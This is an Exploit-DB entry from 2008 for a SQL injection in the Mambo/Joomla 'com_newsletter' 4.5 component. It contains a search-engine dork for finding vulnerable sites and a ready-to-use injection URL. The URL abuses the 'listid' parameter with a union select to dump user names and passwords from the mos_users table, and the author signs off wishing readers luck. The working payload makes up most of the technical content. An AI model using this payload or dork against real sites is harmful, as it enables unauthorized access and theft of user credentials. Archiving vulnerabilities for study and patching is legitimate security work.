Mambo Component 'com_newsletter' 4.5 - 'listid' SQL Injection

EDB-ID:

5007


Author:

S@BUN

Type:

webapps


Platform:

PHP

Date:

2008-01-29


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#########################################################################
#
# joomla SQL Injection(com_newsletter)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_newsletter"
#
########################################################################
EXPLOIT :

index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

#########################################################################
# S@BUN                       www.hackturkiye.com                    S@BUN
#########################################################################
# S@BUN                            GOOD LUCKY                            S@BUN
#########################################################################




notes:
"Newsletter component for mambo 4.5" from Adam van Dongen, www.tim-online.nl //Thanks George

# milw0rm.com [2008-01-29]